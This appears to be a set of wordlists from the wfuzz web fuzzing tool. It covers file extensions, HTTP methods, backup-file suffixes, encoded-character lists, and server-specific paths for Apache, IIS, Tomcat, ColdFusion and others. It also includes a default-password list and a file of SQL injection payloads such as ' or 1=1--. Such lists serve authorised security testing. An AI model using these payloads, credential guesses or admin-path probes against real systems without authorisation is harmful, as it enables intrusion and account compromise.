--------------------------------------------------------------------------------
/wordlist/general/extensions_common.txt:
--------------------------------------------------------------------------------
1 | /
2 | .asp
3 | .aspx
4 | .bat
5 | .c
6 | .cfm
7 | .cgi
8 | .com
9 | .dll
10 | .exe
11 | .htm
12 | .html
13 | .inc
14 | .jhtml
15 | .jsa
16 | .jsp
17 | .log
18 | .mdb
19 | .nsf
20 | .php
21 | .phtml
22 | .pl
23 | .reg
24 | .sh
25 | .shtml
26 | .sql
27 | .txt
28 | .xml
29 |
--------------------------------------------------------------------------------
/wordlist/general/http_methods.txt:
--------------------------------------------------------------------------------
1 | ACL
2 | CHECKIN
3 | CHECKOUT
4 | CONNECT
5 | COPY
6 | DELETE
7 | GET
8 | HEAD
9 | INDEX
10 | LINK
11 | LOCK
12 | MKCOL
13 | MOVE
14 | NOEXISTE
15 | OPTIONS
16 | ORDERPATCH
17 | PATCH
18 | POST
19 | PROPFIND
20 | PROPPATCH
21 | PUT
22 | REPORT
23 | SEARCH
24 | SHOWMETHOD
25 | SPACEJUMP
26 | TEXTSEARCH
27 | TRACE
28 | TRACK
29 | UNCHECKOUT
30 | UNLINK
31 | UNLOCK
32 | VERSION-CONTROL
33 |
--------------------------------------------------------------------------------
/wordlist/general/medium.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/wordlist/general/medium.txt
--------------------------------------------------------------------------------
/wordlist/general/mutations_common.txt:
--------------------------------------------------------------------------------
1 | ~
2 | .001
3 | .002
4 | .1
5 | .2
6 | .7z
7 | .back
8 | .backup
9 | .bak
10 | .bakup
11 | .bas
12 | .bz2
13 | .c
14 | .conf
15 | .copia
16 | .core
17 | .cpp
18 | .dat
19 | .db
20 | .default
21 | .dll
22 | .doc
23 | .ini
24 | .jar
25 | .java
26 | .old
27 | .orig
28 | .pas
29 | .rar
30 | .sav
31 | .saved
32 | .source
33 | .src
34 | .stackdump
35 | .tar
36 | .tar.gz
37 | .temp
38 | .test
39 | .tgz
40 | .tmp
41 | .txt
42 | .war
43 | .Z
44 | .zip
45 |
--------------------------------------------------------------------------------
/wordlist/general/spanish.txt:
--------------------------------------------------------------------------------
1 | abajo
2 | acceso
3 | acciones
4 | actividad
5 | actividades
6 | actual
7 | administracion
8 | adminsitradores
9 | agenda
10 | alias
11 | almacen
12 | antiguo
13 | aplicacion
14 | archivar
15 | archivo
16 | archivos
17 | area
18 | arriba
19 | articulo
20 | articulos
21 | auditoria
22 | ayuda
23 | banca
24 | banco
25 | base
26 | bbdd
27 | bdatos
28 | bolsa
29 | borrar
30 | boton
31 | botones
32 | buscador
33 | buscar
34 | buzon
35 | buzones
36 | cabecera
37 | caja
38 | cajon
39 | carga
40 | cargar
41 | carpeta
42 | carta
43 | cas
44 | cast
45 | castellano
46 | catalogo
47 | catalogos
48 | centro
49 | centros
50 | certificado
51 | certificados
52 | cifrado
53 | clave
54 | claves
55 | cliente
56 | clientes
57 | codigo
58 | coger
59 | coleccion
60 | colecciones
61 | comercio
62 | comercios
63 | componentes
64 | compra
65 | compras
66 | comun
67 | comunes
68 | comunicacion
69 | comunicaciones
70 | conecta
71 | configuracion
72 | contador
73 | contenedor
74 | contenido
75 | contenidos
76 | copia
77 | correo
78 | cs
79 | cuenta
80 | cuentas
81 | dato
82 | datos
83 | dejar
84 | demanda
85 | derecha
86 | desarrollo
87 | descarga
88 | descargas
89 | directorio
90 | diseno
91 | documentacion
92 | documento
93 | documentos
94 | ejemplo
95 | ejemplos
96 | empresa
97 | empresas
98 | enlace
99 | enlaces
100 | entidades
101 | entorno
102 | entornos
103 | entrada
104 | entregar
105 | entregas
106 | envia
107 | es
108 | escuela
109 | esp
110 | espanol
111 | estadisticas
112 | externos
113 | ficha
114 | fichas
115 | fichero
116 | ficheros
117 | forma
118 | formulario
119 | formularios
120 | foro
121 | foros
122 | forum
123 | foto
124 | fotos
125 | frontal
126 | general
127 | gestion
128 | guardar
129 | herramientas
130 | id
131 | imagen
132 | imagenes
133 | implantacion
134 | indice
135 | informacion
136 | ingresa
137 | ingreso
138 | inicio
139 | instalacion
140 | investigado
141 | invitado
142 | invitados
143 | izquierda
144 | juego
145 | juegos
146 | leer
147 | letras
148 | libros
149 | listar
150 | llamada
151 | llamadas
152 | llave
153 | llaves
154 | local
155 | localizador
156 | mapa
157 | medios
158 | menu
159 | mostrar
160 | movimientos
161 | muestra
162 | muestras
163 | nada
164 | noticia
165 | noticias
166 | nucleo
167 | nuevo
168 | nulo
169 | oculto
170 | oficina
171 | oficinas
172 | olvidado
173 | organizacion
174 | organizaciones
175 | pagina
176 | paginas
177 | palabra
178 | panel
179 | pantalla
180 | pantallas
181 | paso
182 | perfil
183 | perfiles
184 | personal
185 | personales
186 | pestana
187 | pizarra
188 | plano
189 | plantilla
190 | plantillas
191 | portada
192 | portal
193 | ppal
194 | primero
195 | principal
196 | principio
197 | privado
198 | probando
199 | procesos
200 | productos
201 | programa
202 | programador
203 | programas
204 | proveedores
205 | proyecto
206 | proyectos
207 | prueba
208 | pruebas
209 | publicacion
210 | publicaciones
211 | publico
212 | puerta
213 | raiz
214 | recoger
215 | registro
216 | registros
217 | remoto
218 | repaso
219 | respaldo
220 | revista
221 | rincon
222 | salon
223 | salvar
224 | seccion
225 | secreto
226 | segundo
227 | seguridad
228 | seleccion
229 | servicios
230 | servidor
231 | sistemas
232 | sitio
233 | subir
234 | sumario
235 | tabla
236 | tablas
237 | tecnico
238 | tecnicos
239 | temas
240 | temporal
241 | tercer
242 | texto
243 | tienda
244 | titular
245 | todas
246 | todo
247 | todos
248 | trabajador
249 | trabajadores
250 | traspaso
251 | usuario
252 | usuarios
253 | vacio
254 | validar
255 | ventana
256 | ver
257 | viejo
258 |
--------------------------------------------------------------------------------
/wordlist/general/test.txt:
--------------------------------------------------------------------------------
1 | classes
2 | css
3 | docs
4 | environment
5 | images
6 | includes
7 | master
8 | prueba
9 | scripts
10 | test
11 |
--------------------------------------------------------------------------------
/wordlist/others/common_pass.txt:
--------------------------------------------------------------------------------
1 |
2 | 123456
3 | 1234567
4 | 12345678
5 | 123asdf
6 | Admin
7 | admin
8 | administrator
9 | asdf123
10 | backup
11 | backupexec
12 | changeme
13 | clustadm
14 | cluster
15 | compaq
16 | default
17 | dell
18 | dmz
19 | domino
20 | exchadm
21 | exchange
22 | ftp
23 | gateway
24 | guest
25 | lotus
26 | money
27 | notes
28 | office
29 | oracle
30 | pass
31 | password
32 | password!
33 | password1
34 | print
35 | qwerty
36 | replicate
37 | seagate
38 | secret
39 | sql
40 | sqlexec
41 | temp
42 | temp!
43 | temp123
44 | test
45 | test!
46 | test123
47 | tivoli
48 | veritas
49 | virus
50 | web
51 | www
52 | KKKKKKK
--------------------------------------------------------------------------------
/wordlist/stress/alphanum_case.txt:
--------------------------------------------------------------------------------
1 | 0
2 | 1
3 | 2
4 | 3
5 | 4
6 | 5
7 | 6
8 | 7
9 | 8
10 | 9
11 | a
12 | b
13 | c
14 | d
15 | e
16 | f
17 | g
18 | h
19 | i
20 | j
21 | k
22 | l
23 | m
24 | n
25 | o
26 | p
27 | q
28 | r
29 | s
30 | t
31 | u
32 | v
33 | w
34 | x
35 | y
36 | z
37 | A
38 | B
39 | C
40 | D
41 | E
42 | F
43 | G
44 | H
45 | I
46 | J
47 | K
48 | L
49 | M
50 | N
51 | O
52 | P
53 | Q
54 | R
55 | S
56 | T
57 | U
58 | V
59 | W
60 | X
61 | Y
62 | Z
63 |
--------------------------------------------------------------------------------
/wordlist/stress/alphanum_case_extra.txt:
--------------------------------------------------------------------------------
1 | !
2 | "
3 | #
4 | $
5 | %
6 | &
7 | '
8 | (
9 | )
10 | *
11 | +
12 | ,
13 | -
14 | .
15 | /
16 | 0
17 | 1
18 | 2
19 | 3
20 | 4
21 | 5
22 | 6
23 | 7
24 | 8
25 | 9
26 | :
27 | ;
28 | <
29 | =
30 | >
31 | ?
32 | @
33 | A
34 | B
35 | C
36 | D
37 | E
38 | F
39 | G
40 | H
41 | I
42 | J
43 | K
44 | L
45 | M
46 | N
47 | O
48 | P
49 | Q
50 | R
51 | S
52 | T
53 | U
54 | V
55 | W
56 | X
57 | Y
58 | Z
59 | [
60 | \
61 | ]
62 | ^
63 | _
64 | `
65 | a
66 | b
67 | c
68 | d
69 | e
70 | f
71 | g
72 | h
73 | i
74 | j
75 | k
76 | l
77 | m
78 | n
79 | o
80 | p
81 | q
82 | r
83 | s
84 | t
85 | u
86 | v
87 | w
88 | x
89 | y
90 | z
91 | {
92 | |
93 | }
94 | ~
95 |
96 |
--------------------------------------------------------------------------------
/wordlist/stress/char.txt:
--------------------------------------------------------------------------------
1 | a
2 | b
3 | c
4 | d
5 | e
6 | f
7 | g
8 | h
9 | i
10 | j
11 | k
12 | l
13 | m
14 | n
15 | o
16 | p
17 | q
18 | r
19 | s
20 | t
21 | u
22 | v
23 | w
24 | x
25 | y
26 | z
27 |
--------------------------------------------------------------------------------
/wordlist/stress/doble_uri_hex.txt:
--------------------------------------------------------------------------------
1 | %2500
2 | %2501
3 | %2502
4 | %2503
5 | %2504
6 | %2505
7 | %2506
8 | %2507
9 | %2508
10 | %2509
11 | %250a
12 | %250b
13 | %250c
14 | %250d
15 | %250e
16 | %250f
17 | %2510
18 | %2511
19 | %2512
20 | %2513
21 | %2514
22 | %2515
23 | %2516
24 | %2517
25 | %2518
26 | %2519
27 | %251a
28 | %251b
29 | %251c
30 | %251d
31 | %251e
32 | %251f
33 | %2520
34 | %2521
35 | %2522
36 | %2523
37 | %2524
38 | %2525
39 | %2526
40 | %2527
41 | %2528
42 | %2529
43 | %252a
44 | %252b
45 | %252c
46 | %252d
47 | %252e
48 | %252f
49 | %2530
50 | %2531
51 | %2532
52 | %2533
53 | %2534
54 | %2535
55 | %2536
56 | %2537
57 | %2538
58 | %2539
59 | %253a
60 | %253b
61 | %253c
62 | %253d
63 | %253e
64 | %253f
65 | %2540
66 | %2541
67 | %2542
68 | %2543
69 | %2544
70 | %2545
71 | %2546
72 | %2547
73 | %2548
74 | %2549
75 | %254a
76 | %254b
77 | %254c
78 | %254d
79 | %254e
80 | %254f
81 | %2550
82 | %2551
83 | %2552
84 | %2553
85 | %2554
86 | %2555
87 | %2556
88 | %2557
89 | %2558
90 | %2559
91 | %255a
92 | %255b
93 | %255c
94 | %255d
95 | %255e
96 | %255f
97 | %2560
98 | %2561
99 | %2562
100 | %2563
101 | %2564
102 | %2565
103 | %2566
104 | %2567
105 | %2568
106 | %2569
107 | %256a
108 | %256b
109 | %256c
110 | %256d
111 | %256e
112 | %256f
113 | %2570
114 | %2571
115 | %2572
116 | %2573
117 | %2574
118 | %2575
119 | %2576
120 | %2577
121 | %2578
122 | %2579
123 | %257a
124 | %257b
125 | %257c
126 | %257d
127 | %257e
128 | %257f
129 | %2580
130 | %2581
131 | %2582
132 | %2583
133 | %2584
134 | %2585
135 | %2586
136 | %2587
137 | %2588
138 | %2589
139 | %258a
140 | %258b
141 | %258c
142 | %258d
143 | %258e
144 | %258f
145 | %2590
146 | %2591
147 | %2592
148 | %2593
149 | %2594
150 | %2595
151 | %2596
152 | %2597
153 | %2598
154 | %2599
155 | %259a
156 | %259b
157 | %259c
158 | %259d
159 | %259e
160 | %259f
161 | %25a0
162 | %25a1
163 | %25a2
164 | %25a3
165 | %25a4
166 | %25a5
167 | %25a6
168 | %25a7
169 | %25a8
170 | %25a9
171 | %25aa
172 | %25ab
173 | %25ac
174 | %25ad
175 | %25ae
176 | %25af
177 | %25b0
178 | %25b1
179 | %25b2
180 | %25b3
181 | %25b4
182 | %25b5
183 | %25b6
184 | %25b7
185 | %25b8
186 | %25b9
187 | %25ba
188 | %25bb
189 | %25bc
190 | %25bd
191 | %25be
192 | %25bf
193 | %25c0
194 | %25c1
195 | %25c2
196 | %25c3
197 | %25c4
198 | %25c5
199 | %25c6
200 | %25c7
201 | %25c8
202 | %25c9
203 | %25ca
204 | %25cb
205 | %25cc
206 | %25cd
207 | %25ce
208 | %25cf
209 | %25d0
210 | %25d1
211 | %25d2
212 | %25d3
213 | %25d4
214 | %25d5
215 | %25d6
216 | %25d7
217 | %25d8
218 | %25d9
219 | %25da
220 | %25db
221 | %25dc
222 | %25dd
223 | %25de
224 | %25df
225 | %25e0
226 | %25e1
227 | %25e2
228 | %25e3
229 | %25e4
230 | %25e5
231 | %25e6
232 | %25e7
233 | %25e8
234 | %25e9
235 | %25ea
236 | %25eb
237 | %25ec
238 | %25ed
239 | %25ee
240 | %25ef
241 | %25f0
242 | %25f1
243 | %25f2
244 | %25f3
245 | %25f4
246 | %25f5
247 | %25f6
248 | %25f7
249 | %25f8
250 | %25f9
251 | %25fa
252 | %25fb
253 | %25fc
254 | %25fd
255 | %25fe
256 | %25ff
257 |
--------------------------------------------------------------------------------
/wordlist/stress/uri_hex.txt:
--------------------------------------------------------------------------------
1 | %00
2 | %01
3 | %02
4 | %03
5 | %04
6 | %05
7 | %06
8 | %07
9 | %08
10 | %09
11 | %0a
12 | %0b
13 | %0c
14 | %0d
15 | %0e
16 | %0f
17 | %10
18 | %11
19 | %12
20 | %13
21 | %14
22 | %15
23 | %16
24 | %17
25 | %18
26 | %19
27 | %1a
28 | %1b
29 | %1c
30 | %1d
31 | %1e
32 | %1f
33 | %20
34 | %21
35 | %22
36 | %23
37 | %24
38 | %25
39 | %26
40 | %27
41 | %28
42 | %29
43 | %2a
44 | %2b
45 | %2c
46 | %2d
47 | %2e
48 | %2f
49 | %30
50 | %31
51 | %32
52 | %33
53 | %34
54 | %35
55 | %36
56 | %37
57 | %38
58 | %39
59 | %3a
60 | %3b
61 | %3c
62 | %3d
63 | %3e
64 | %3f
65 | %40
66 | %41
67 | %42
68 | %43
69 | %44
70 | %45
71 | %46
72 | %47
73 | %48
74 | %49
75 | %4a
76 | %4b
77 | %4c
78 | %4d
79 | %4e
80 | %4f
81 | %50
82 | %51
83 | %52
84 | %53
85 | %54
86 | %55
87 | %56
88 | %57
89 | %58
90 | %59
91 | %5a
92 | %5b
93 | %5c
94 | %5d
95 | %5e
96 | %5f
97 | %60
98 | %61
99 | %62
100 | %63
101 | %64
102 | %65
103 | %66
104 | %67
105 | %68
106 | %69
107 | %6a
108 | %6b
109 | %6c
110 | %6d
111 | %6e
112 | %6f
113 | %70
114 | %71
115 | %72
116 | %73
117 | %74
118 | %75
119 | %76
120 | %77
121 | %78
122 | %79
123 | %7a
124 | %7b
125 | %7c
126 | %7d
127 | %7e
128 | %7f
129 | %80
130 | %81
131 | %82
132 | %83
133 | %84
134 | %85
135 | %86
136 | %87
137 | %88
138 | %89
139 | %8a
140 | %8b
141 | %8c
142 | %8d
143 | %8e
144 | %8f
145 | %90
146 | %91
147 | %92
148 | %93
149 | %94
150 | %95
151 | %96
152 | %97
153 | %98
154 | %99
155 | %9a
156 | %9b
157 | %9c
158 | %9d
159 | %9e
160 | %9f
161 | %a0
162 | %a1
163 | %a2
164 | %a3
165 | %a4
166 | %a5
167 | %a6
168 | %a7
169 | %a8
170 | %a9
171 | %aa
172 | %ab
173 | %ac
174 | %ad
175 | %ae
176 | %af
177 | %b0
178 | %b1
179 | %b2
180 | %b3
181 | %b4
182 | %b5
183 | %b6
184 | %b7
185 | %b8
186 | %b9
187 | %ba
188 | %bb
189 | %bc
190 | %bd
191 | %be
192 | %bf
193 | %c0
194 | %c1
195 | %c2
196 | %c3
197 | %c4
198 | %c5
199 | %c6
200 | %c7
201 | %c8
202 | %c9
203 | %ca
204 | %cb
205 | %cc
206 | %cd
207 | %ce
208 | %cf
209 | %d0
210 | %d1
211 | %d2
212 | %d3
213 | %d4
214 | %d5
215 | %d6
216 | %d7
217 | %d8
218 | %d9
219 | %da
220 | %db
221 | %dc
222 | %dd
223 | %de
224 | %df
225 | %e0
226 | %e1
227 | %e2
228 | %e3
229 | %e4
230 | %e5
231 | %e6
232 | %e7
233 | %e8
234 | %e9
235 | %ea
236 | %eb
237 | %ec
238 | %ed
239 | %ee
240 | %ef
241 | %f0
242 | %f1
243 | %f2
244 | %f3
245 | %f4
246 | %f5
247 | %f6
248 | %f7
249 | %f8
250 | %f9
251 | %fa
252 | %fb
253 | %fc
254 | %fd
255 | %fe
256 | %ff
257 |
--------------------------------------------------------------------------------
/wordlist/vulns/apache.txt:
--------------------------------------------------------------------------------
1 | .htaccess
2 | .htpasswd
3 | .meta
4 | .web
5 | access_log
6 | cgi
7 | cgi-bin
8 | cgi-pub
9 | cgi-script
10 | dummy
11 | error
12 | error_log
13 | htdocs
14 | httpd
15 | httpd.pid
16 | icons
17 | index.html
18 | logs
19 | manual
20 | phf
21 | printenv
22 | server-info
23 | server-status
24 | status
25 | test-cgi
26 | tmp
27 | ~bin
28 | ~ftp
29 | ~nobody
30 | ~root
31 |
--------------------------------------------------------------------------------
/wordlist/vulns/coldfusion.txt:
--------------------------------------------------------------------------------
1 | CFIDE
2 | CFIDE/administrator
3 | CFIDE/administrator/aboutcf.cfm
4 | CFIDE/administrator/Application.cfm
5 | CFIDE/administrator/checkfile.cfm
6 | CFIDE/administrator/enter.cfm
7 | CFIDE/administrator/header.cfm
8 | CFIDE/administrator/homefile.cfm
9 | CFIDE/administrator/homepage.cfm
10 | CFIDE/administrator/index.cfm
11 | CFIDE/administrator/left.cfm
12 | CFIDE/administrator/linkdirect.cfm
13 | CFIDE/administrator/login.cfm
14 | CFIDE/administrator/logout.cfm
15 | CFIDE/administrator/navserver.cfm
16 | CFIDE/administrator/right.cfm
17 | CFIDE/administrator/tabs.cfm
18 | CFIDE/administrator/welcome.cfm
19 | CFIDE/administrator/welcomedoc.cfm
20 | CFIDE/administrator/welcomeexapps.cfm
21 | CFIDE/administrator/welcomefooter.cfm
22 | CFIDE/administrator/welcomegetstart.cfm
--------------------------------------------------------------------------------
/wordlist/vulns/fatwire.txt:
--------------------------------------------------------------------------------
1 | servlet/HelloCS
2 | servlet/ContentServer
3 | servlet/Satellite
4 | servlet/CatalogManager
5 | servlet/BlobServer
6 | servlet/TreeManager
7 | servlet/CookieServer
8 | servlet/CacheServer
9 | servlet/EvalServer
10 | servlet/DebugServer
11 | servlet/FlushServer
12 | servlet/SeedDispatchServer
13 | servlet/Inventory
14 | servlet/SyncSeedDispatchServer
15 | servlet/PageDispatchServer
16 | servlet/DispatchManager
17 | servlet
18 | HelloCS
19 | ContentServer
20 | Satellite
21 | CatalogManager
22 | BlobServer
23 | TreeManager
24 | CookieServer
25 | CacheServer
26 | EvalServer
27 | DebugServer
28 | FlushServer
29 | SeedDispatchServer
30 | Inventory
31 | SyncSeedDispatchServer
32 | PageDispatchServer
33 | DispatchManager
34 | Xcelerate/Admin/LoginPage.html
35 | Xcelerate
36 | Admin
37 | LoginPage
38 | LoginPage.html
39 | Xcelerate/LoginPage.html
40 | futuretense_cs/adminforms.html
41 | futuretense_cs
42 | adminforms
43 | adminforms.html
44 | futuretense
45 | openmarket
46 | fatwire
47 | divine
48 | contentserver
49 | xcelerate
50 | assetmaker
51 |
--------------------------------------------------------------------------------
/wordlist/vulns/frontpage.txt:
--------------------------------------------------------------------------------
1 | .htaccess
2 | QUERYHIT.HTM
3 | Search
4 | _fpclass
5 | _private
6 | _vti_adm
7 | _vti_aut
8 | _vti_bin
9 | _vti_cnf
10 | _vti_inf.html
11 | _vti_log
12 | _vti_pvt
13 | _vti_script
14 | _vti_txt
15 | admin.dll
16 | admin.exe
17 | administrators.pwd
18 | author.dll
19 | author.exe
20 | author.log
21 | authors.pwd
22 | cgi-bin
23 | default.htm
24 | frontpg.ini
25 | iisadmin
26 | isadmin
27 | logo.gif
28 | owssvr.dll
29 | queryhit.htm
30 | samples
31 | search
32 | service.grp
33 | service.pwd
34 | shtml.exe
35 | srchadm
36 | users.pwd
37 | vti_inf.html
38 |
--------------------------------------------------------------------------------
/wordlist/vulns/iis.txt:
--------------------------------------------------------------------------------
1 | Micros~1
2 | WebSer~1
3 | _mem_bin
4 | _private
5 | _vti_adm
6 | _vti_aut
7 | _vti_bin
8 | _vti_cnf
9 | _vti_log
10 | _vti_pvt
11 | _vti_script
12 | _vti_txt
13 | administration
14 | adsamples
15 | archiv~1
16 | asp
17 | aspnet_client
18 | asps
19 | bin
20 | bins
21 | cgi-bin
22 | cmsample
23 | common
24 | common~1
25 | db
26 | fpsample
27 | help
28 | iisadmin
29 | iisadmpwd
30 | iishelp
31 | iissamples
32 | images
33 | inetpub
34 | inetsrv
35 | isapi
36 | msadc
37 | pbserver
38 | printers
39 | progra~1
40 | samples
41 | scripts
42 | scripts
43 | scripts/samples
44 | scripts/tools
45 | sites
46 | siteserver
47 | system
48 | system_web
49 | web
50 | webpub
51 | winnt
52 | wwwroot
53 | x.cfm
54 | x.htx
55 | x.ida
56 | x.idc
57 | x.idq
58 | x.pl
59 | x.shtml
60 |
--------------------------------------------------------------------------------
/wordlist/vulns/iplanet.txt:
--------------------------------------------------------------------------------
1 | ?Publisher
2 | ?wp-cs-dump
3 | ?wp-html-rend
4 | ?wp-start-ver
5 | ?wp-stop-ver
6 | ?wp-uncheckout
7 | ?wp-usr-prop
8 | ?wp-ver-diff
9 | ?wp-ver-info
10 | ?wp-verify-link
11 | admin-serv
12 | admin-serv/config/admpw
13 | admpw
14 | agents
15 | bin
16 | ca
17 | ca
18 | cgi-bin
19 | config
20 | dirb_random.cgi
21 | dirb_random.jsp
22 | dirb_random.shtml
23 | docs
24 | dsgw
25 | help
26 | index.html
27 | jsp
28 | manual
29 | mc-icons
30 | netshare
31 | ns-icons
32 | publisher
33 | search
34 | search-ui
35 | servlet
36 | servlets
37 |
--------------------------------------------------------------------------------
/wordlist/vulns/jrun.txt:
--------------------------------------------------------------------------------
1 | SmarTicketApp/index.html
2 | WEB-INF/webapp.properties
3 | WEB-INF/web.xml
4 | compass/logon.jsp
5 | databasenotes.html
6 | flash/java/javabean/FlashJavaBean.html
7 | jrunscripts
8 | jstl-war/index.html
9 | techniques/servlets/index.html
10 | travelnet/home.jsp
11 | worldmusic/action/cdlist
12 | worldmusic/action/catalog
13 | ws-client/loanCalculation.jsp
14 |
--------------------------------------------------------------------------------
/wordlist/vulns/netware.txt:
--------------------------------------------------------------------------------
1 | ICHAINErrors
2 | ICSLogin
3 | ICHAINLogout
4 | ICSIBroker
5 | NetStorage
6 | iManager
7 | eMFrame
8 | oneNet
9 | ICHAIN
10 | ICS
11 | NSearch
12 | SearchServlet
13 | site
14 | home.html
15 | iFolder
16 | update
17 | webacc
18 | nps
19 |
--------------------------------------------------------------------------------
/wordlist/vulns/oracle9i.txt:
--------------------------------------------------------------------------------
1 | CookieExample
2 | Counter
3 | DateServlet
4 | HelloWorldServlet
5 | RequestParamExample
6 | SessionExample
7 | SessionServlet
8 | SimpleServlet
9 | SnoopServlet
10 | basic
11 | cal
12 | cgi-bin
13 | echo
14 | examples
15 | fcgi-bin
16 | hellouser
17 | hellouser.jsp
18 | j2ee
19 | jsp
20 | login.html
21 | ojspdemos
22 | perl
23 | printenv
24 | servlet
25 | simple
26 | snoop.jsp
27 | snp
28 | usebean.jsp
29 | welcomeuser.jsp
30 |
--------------------------------------------------------------------------------
/wordlist/vulns/sql_inj.txt:
--------------------------------------------------------------------------------
1 | '
2 | --ora_sqls
3 | #mysql
4 | '#mysql
5 | and 1=1
6 | and USER=USER
7 | and user()=user()
8 | and 2=0
9 | or 2=2
10 | ' and '2'='2
11 | ' and '2'='0
12 | ' or '2'='2
13 | /*ora_mysql*/and/**/2=2
14 | /*ora_mysql*/and/**/2=0
15 | '/*ora_mysql*/and/**/'2'='2
16 | '/*ora_mysql*/and/**/'2'='0
17 | '/*ora_mysql*/or/**/'2'='2
18 | and 2=2#mysql
19 | and 2=0#mysql
20 | and 2=2-- oracle_mysql
21 | and 2=0-- oracle_mysql
22 | ' and '2'='2'#mysql
23 | ' and '2'='0'#mysql
24 | ' and '2'='2'-- oracle
25 | ' and '2'='0'-- oracle
26 | 999999999999999999
27 | 1e100
28 | 2 or 2=2
29 | 2' or '2'='2
30 | order by 1--
31 | admin'--
32 | admin'
33 | 'test
34 | 'test--
35 | ' or 1=1--
36 | or 1=1--
37 | or 1=1
38 | or 1=1#
39 | " or 1=1#
40 | admin'#
41 | now()
42 |
43 |
--------------------------------------------------------------------------------
/wordlist/vulns/sunas.txt:
--------------------------------------------------------------------------------
1 | ias-samples
2 | ias-samples/index.html
3 | index.html
4 | cgi-bin
5 | cgi-bin/gx.cgi
6 | cgi-bin/gx.dll
7 | cgi-bin/gx.exe
8 | gx
9 | gx.cgi
10 | gx.exe
11 | GXApp
12 | GXApp/index.html
13 | GXApp/COnlineBank
14 | GXApp/COnlineBank/COBLogin.html
15 | GXApp/CSample
16 | GXApp/CSample/index.html
17 | GXApp/images
18 | GXApp/OnlineBank
19 | GXApp/OnlineBank/OBLogin.html
20 | fortune
21 | NASApp/fortune/fortune
22 | lotery
23 | COnlineBank
24 | CSample
25 | OnlineBank
26 | NASApp
27 | NASApp/system
28 | NASApp/system/ValidationError.jsp
29 | NASApp/system/ExceptionThrown.jsp
30 | NASApp/system/JSPRunner
31 | NASApp/system/JSPRunnerSticky
32 | NASApp/system/SessionInvalidator
33 | NASApp/system/StaticServlet
34 | NASApp/system/WelcomeListServlet
35 | NASApp/system/FormAuthServlet
36 | NASApp/system/CertAuthServlet
37 | NASApp/system/BasicAuthServlet
38 | system
39 | ValidationError.jsp
40 | ExceptionThrown.jsp
41 | JSPRunner
42 | JSPRunnerSticky
43 | SessionInvalidator
44 | StaticServlet
45 | WelcomeListServlet
46 | FormAuthServlet
47 | CertAuthServlet
48 | BasicAuthServlet
49 | com.netscape.server.servlet.jsp.JSPRunner
50 | servlet
51 | classes
52 |
53 |
--------------------------------------------------------------------------------
/wordlist/vulns/tests.txt:
--------------------------------------------------------------------------------
1 | test
2 | test1
3 | test2
4 | test00
5 | test01
6 | tests
7 | testing
8 | tst
9 | tsts
10 | probando
11 | prueba
12 | prueba1
13 | prueba2
14 | prueba00
15 | prueba01
16 | pruebas
17 | prova
18 | prova1
19 | prova2
20 | provas
21 | TEST
22 | TESTS
23 | Test
24 | Tests
25 | tester
26 | Pruebas
27 | PRUEBA
28 | PRUEBAS
29 | Prova
30 | Provas
31 | demo
32 | DEMO
33 | Demo
34 |
35 |
--------------------------------------------------------------------------------
/wordlist/vulns/tomcat.txt:
--------------------------------------------------------------------------------
1 | examples
2 | examples/jsp/index.html
3 | examples/servlets/index.html
4 | examples/servlet/HelloWorldExample
5 | examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample
6 | examples/servlet/snoop
7 | examples/servlet/SnoopServlet
8 | examples/servlet/org.apache.catalina.INVOKER.SnoopServlet
9 | examples/servlet/TroubleShooter
10 | examples/servlet/org.apache.catalina.INVOKER.TroubleShooter
11 | examples/jsp/snp/snoop.jsp
12 | examples/jsp/source.jsp
13 | servlet/default/
14 | servlet/org.apache.catalina.servlets.DefaultServlet/
15 | examples/servlet/default/jsp/snp/snoop.jsp
16 | examples/servlet/default/jsp/source.jsp
17 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp
18 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp
19 | manager
20 | tomcat-docs
21 | webdav
22 | webdav/index.html
23 | webdav/servlet/webdav/
24 | webdav/servlet/org.apache.catalina.servlets.WebdavServlet/
25 | servlet/org.apache.catalina.servlets.WebdavServlet/
26 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/
27 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
28 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
29 | servlet/org.apache.catalina.servlets.SnoopAllServlet
30 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet
31 | servlet/org.apache.catalina.servlets.ManagerServlet
32 | servlet/org.apache.catalina.servlets.HTMLManagerServlet
33 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet
34 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
35 | servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
36 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif
37 | ?a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c=1
38 |
--------------------------------------------------------------------------------
/wordlist/vulns/vignette.txt:
--------------------------------------------------------------------------------
1 | 0,,,00
2 | 0,,,00.html
3 | 1,,,00
4 | 1,,,00.html
5 | CDA
6 | CDS
7 | CMA
8 | CMS
9 | Deleting
10 | Docs
11 | Editing
12 | HOME
13 | Images
14 | Internal
15 | MetaDataUpdate
16 | Report
17 | Select
18 | StoryServer
19 | TMT
20 | VGN
21 | XML
22 | ac
23 | allvars
24 | asp
25 | aspstatus
26 | cda
27 | cds
28 | cma
29 | cms
30 | controller
31 | diag
32 | docs
33 | edit
34 | error
35 | errorpage
36 | errors
37 | executequery
38 | external
39 | home
40 | ibm
41 | initialize
42 | internal
43 | jsp
44 | jspstatus
45 | jsptest
46 | legacy
47 | license
48 | listcolumns
49 | login
50 | loginlogo
51 | logo
52 | main
53 | menu
54 | metadataupdate
55 | performance
56 | portal
57 | ppstats
58 | preview
59 | previewer
60 | record
61 | reset
62 | save
63 | stat
64 | status
65 | storyserver
66 | style
67 | stylepreviewer
68 | utils
69 | vdc
70 | vgn
71 | vr
72 | Ping.jsp
73 | HelloWorld.jsp
74 |
75 |
--------------------------------------------------------------------------------
/wordlist/vulns/weblogic.txt:
--------------------------------------------------------------------------------
1 | *
